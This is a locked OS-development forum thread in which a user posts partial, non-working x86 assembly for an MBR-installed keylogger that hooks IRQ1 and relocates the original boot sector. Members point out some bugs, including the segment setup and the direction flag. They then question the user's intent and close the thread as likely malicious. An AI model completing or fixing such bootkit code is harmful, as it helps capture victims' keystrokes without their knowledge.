OSDev.org

The Place to Start for Operating System Developers
It is currently Sun Aug 01, 2021 2:16 pm

All times are UTC - 6 hours




Post new topic This topic is locked, you cannot edit posts or make further replies.  [ 12 posts ] 
Author Message
 Post subject: hook irq1 installed at MBR
PostPosted: Wed Jan 24, 2018 7:46 am 
Offline

Joined: Wed Jan 24, 2018 7:26 am
Posts: 4
i am coding a program that hook teh IRQ 1 and is installed onto MBR and restore teh original MBR that is saved at sector 7 however the OS don't bootstrap. here is my code:

Code:
org 100h
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV AX,301H
MOV CX,7
INT 13H
MOV SI,int9_installer
MOV DI,0E00H
MOV CX,1FDH
REP MOVSB
ES
MOV WORD[0FFEH],0AA55h
MOV AX,301H
MOV CX,1
INT 13H
RET

int9_installer:
cli
push es
mov ax,0
mov es,ax
es
mov cx,[24h]
es
mov dx,[26h]

...

mov cx,0
mov dx,2000h
es
mov [24h],cx
es
mov [26h],dx
pop es
sti
...

mov      si,3100h
mov      al,10h
mov      [si],al
mov      al,0
mov      [si+1],al
mov      al,01
mov      [si+2],al
mov           al,0
mov      [si+3],al
MOV      AX,7C00H
mov      [si+4],ax
mov      ax,0h
mov      [si+6],ax
mov      ax,7
mov      [si+8],ax
xor      ax,ax
mov      [si+0ah],ax
mov      [si+0ch],ax
mov      [si+0eh],ax

mov      ah,42h
mov      dl,80h
INT      13H


JMP           0:7C00H



Where is wrong at my code above???


Top
 Profile  
 
 Post subject: Re: hook irq1 installed at MBR
PostPosted: Wed Jan 24, 2018 10:20 am 
Offline
Member
Member
User avatar

Joined: Sat Mar 31, 2012 3:07 am
Posts: 4204
Location: Chichester, UK
You don't initialize the segment registers, you don't initialize the direction flag, and you set the origin to 100h, which is almost certainly not what you intended. I'm not going to wade through the code to find other mistakes, but those ones need to be corrected first


Top
 Profile  
 
 Post subject: Re: hook irq1 installed at MBR
PostPosted: Wed Jan 24, 2018 10:44 am 
Offline
Member
Member
User avatar

Joined: Sun Oct 22, 2006 7:01 am
Posts: 2637
Location: Devon, UK
Hi,

In addition to iansjack's post, we have eabsolutely no context for the code. You call this a "program". Does that mean that it is *not* running in a freestanding environment (which could also explain the org directive).

We also don't have a very good idea of what you expect to see compared with what you actually do see. Can you use some other tool to verify that the sectors are on disk where you expect them to be?

Cheers,
Adam


Top
 Profile  
 
 Post subject: Re: hook irq1 installed at MBR
PostPosted: Wed Jan 24, 2018 11:22 am 
Offline

Joined: Wed Jan 24, 2018 7:26 am
Posts: 4
my code is a keylogger that hook IRQ 1 and is installed onto MBR and teh original MBR is writed at sector 7 to be jmp after my keylogger is installed. org 100h directive is because is written in fasm. how to set direction flag and i should set segment registers to what value?


Top
 Profile  
 
 Post subject: Re: hook irq1 installed at MBR
PostPosted: Wed Jan 24, 2018 11:30 am 
Offline
Member
Member
User avatar

Joined: Sat Mar 31, 2012 3:07 am
Posts: 4204
Location: Chichester, UK
I think you need to learn a little more about how the processor works, its state after reset, and the boot sequence before attempting this sort of program. Also, I'm not convinced that you understand the ORG directive.

And, I guess, the question is what are you attempting to achieve by hooking this interrupt. It is, potentially, something that I wouldn't feel comfortable helping with.


Top
 Profile  
 
 Post subject: Re: hook irq1 installed at MBR
PostPosted: Wed Jan 24, 2018 9:58 pm 
Offline
Member
Member
User avatar

Joined: Sat Jan 15, 2005 12:00 am
Posts: 8561
Location: At his keyboard!
Hi,

Apolo wrote:
my code is a keylogger that hook IRQ 1 and is installed onto MBR and teh original MBR is writed at sector 7 to be jmp after my keylogger is installed. org 100h directive is because is written in fasm. how to set direction flag and i should set segment registers to what value?


To clear the direction flag, use the CLD instruction.

The BIOS loads the MBR at "some combination of segment:offset that adds up to 0x0007C00". If you set ORG to 0x0100 (telling the assemebler to assume the "offset" for the start of your code will be 0x0100) then you'd need your segments to fulful the equation "0x0007C00 = (segment / 16) + 0x0100". That means you'd need to set segments to 0x07D0. Note that it's much easier to set ORG to 0x00007C00 and set all segments to zero.

For the rest, for assembly language there are only 2 kinds of bugs - the comments don't describe a correct algorithm, or the instructions don't match the comments. Your code has no comments and therefore your code is 100% bugs.

Finally; don't forget that all sane operating systems dispose of the BIOS early during boot and install their own (protected mode or long mode) device drivers with their own IRQ handlers; so (assuming things like TPM and "secureboot" don't do their job) your code still can't work.


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


Top
 Profile  
 
 Post subject: Re: hook irq1 installed at MBR
PostPosted: Thu Jan 25, 2018 5:19 am 
Offline
Member
Member
User avatar

Joined: Sun Oct 22, 2006 7:01 am
Posts: 2637
Location: Devon, UK
That last point is the most important for a keylogger. Any OS worth its salt will end up reinstalling an IDT and chances are your code will end up in an in-mapped memory page anyway.

You'd generally be better off with a hardware key logger but what you are doing may be at best immoral and at worst illegal :!:

Before we go further, could you clarify the intention of what you are doing. If you're just playing with boot code on your own machine then fine.

Cheers,
Adam


Top
 Profile  
 
 Post subject: Re: hook irq1 installed at MBR
PostPosted: Fri Jan 26, 2018 4:26 am 
Offline

Joined: Wed Jan 24, 2018 7:26 am
Posts: 4
i think BIOS of my PCs is all infected because i try this code most simple but the PCs don't bootsrap however. see my most simple code:

Code:
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV CX,7
MOV AX,301H
INT 13H
MOV CX,1BDH
MOV SI,example
MOV DI,0E00H
REP MOVSB
MOV AX,301H
MOV BX,0E00H
MOV AX,301H
MOV CX,1
INT 13H
RET

example:
MOV AX,201H
PUSH ES
MOV BX,0
MOV ES,BX
MOV BX,7C00H
MOV CX,7
INT 13H
POP ES
cs
jmp bx

codesize:

Aaaaaaaaa! what is the problem of my code? :x


Top
 Profile  
 
 Post subject: Re: hook irq1 installed at MBR
PostPosted: Fri Jan 26, 2018 5:15 am 
Offline
Member
Member
User avatar

Joined: Sat Mar 31, 2012 3:07 am
Posts: 4204
Location: Chichester, UK
The main problem is that you haven't told us what you are trying to do and why. Until we know that it is unlikely that you will get any further help on this forum. It's devoted to OS development, not hacking.


Top
 Profile  
 
 Post subject: Re: hook irq1 installed at MBR
PostPosted: Fri Jan 26, 2018 5:24 am 
Offline
Member
Member
User avatar

Joined: Sun Oct 22, 2006 7:01 am
Posts: 2637
Location: Devon, UK
You one more attempt at explaining why you are doing this before the thread gets locked. If you are doing this for legit reasons, it sounds like an interesting problem to tackle, but we will also need more of a technical explanation. A bug in your code or methodology is much more likely than your BIOS being infected.

Cheers,
Adam


Top
 Profile  
 
 Post subject: Re: hook irq1 installed at MBR
PostPosted: Fri Jan 26, 2018 5:31 am 
Offline

Joined: Wed Jan 24, 2018 7:26 am
Posts: 4
resume:

i am trying to bootstrap from sector 7 that is where teh original MBR is writed. can someone help me?? i am desesperate!


Top
 Profile  
 
 Post subject: Re: hook irq1 installed at MBR
PostPosted: Fri Jan 26, 2018 6:02 am 
Offline
Member
Member
User avatar

Joined: Sun Oct 22, 2006 7:01 am
Posts: 2637
Location: Devon, UK
Unfortunately locked as promised. I can only assume that this is being done for nefarious purposes...


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic This topic is locked, you cannot edit posts or make further replies.  [ 12 posts ] 

All times are UTC - 6 hours


Who is online

Users browsing this forum: No registered users and 5 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group